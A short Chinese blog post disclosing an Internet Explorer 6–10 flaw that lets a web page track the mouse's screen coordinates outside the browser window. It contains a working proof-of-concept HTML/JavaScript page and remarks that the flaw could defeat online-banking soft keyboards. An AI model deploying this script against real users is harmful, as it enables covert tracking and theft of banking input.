IE浏览器鼠标坐标跟踪安全风险,通杀全版本
2013-01-21 17:17
232 查看
刚在Seclist上又看到了IE漏洞。该漏洞的主要影响是能够跟踪鼠标坐标位置,即使当前鼠标位置位于非浏览器窗口。该漏洞最先被spider.io团队发现。影响版本:IE6-10测试:在系统目录下新建一个html文件,代码如下:
<!DOCTYPEhtml> <html> <head> <metacharset="utf-8"/> <title>ExploitDemo</title> <scripttype="text/javascript"> window.attachEvent("onload",function(){ vardetector=document.getElementById("detector"); detector.attachEvent("onmousemove",function(e){ detector.innerHTML=e.screenX+","+e.screenY; }); setInterval(function(){ detector.fireEvent("onmousemove"); },100); }); </script> </head> <body> <divid="detector"></div> </body> </html>
用IE打开新建的html文件
试想将该漏洞上传到别人的电脑对方还使用网银,以为软键盘就安全了,测试后发现不以为然。
相关文章推荐
- IE浏览器鼠标坐标跟踪安全风险,通杀全版本---IE的最大特色
- IE6-10浏览器鼠标坐标跟踪安全风险
- IE下的一个安全BUG —— 可跟踪用户的系统鼠标位置
- 跟踪鼠标在窗口上的坐标
- 关于在IE下的一个安全BUG --可用于跟踪用户的系统鼠标位置
- 沸腾展望新闻多媒体系统安全缺陷(通杀目前所有版本)
- IE下的一个安全BUG —— 可实时跟踪系统鼠标位置
- AutoLISP实时跟踪鼠标坐标
- MFC中用OpenCV显示图像,并跟踪鼠标显示图像的坐标与像素
- 基于OpenCV下---多红外目标检测、跟踪、质心坐标提取、跟踪目标排序
- Android静态安全检测 -> 明文数字证书风险
- 在html中判断IE浏览器的版本
- JavaScript读书笔记:页面元素的坐标和鼠标事件的坐标
- dephi Twebbrowser控件运行使用指定IE浏览器版本
- 将鼠标位置转换成世界坐标
- 判断IE浏览器的版本问题
- delphi 获取鼠标当前位置的相对坐标
- 动态获得鼠标坐标的delphi代码
- 测试当前IE浏览器文档模型版本的js代码(使用documenMode)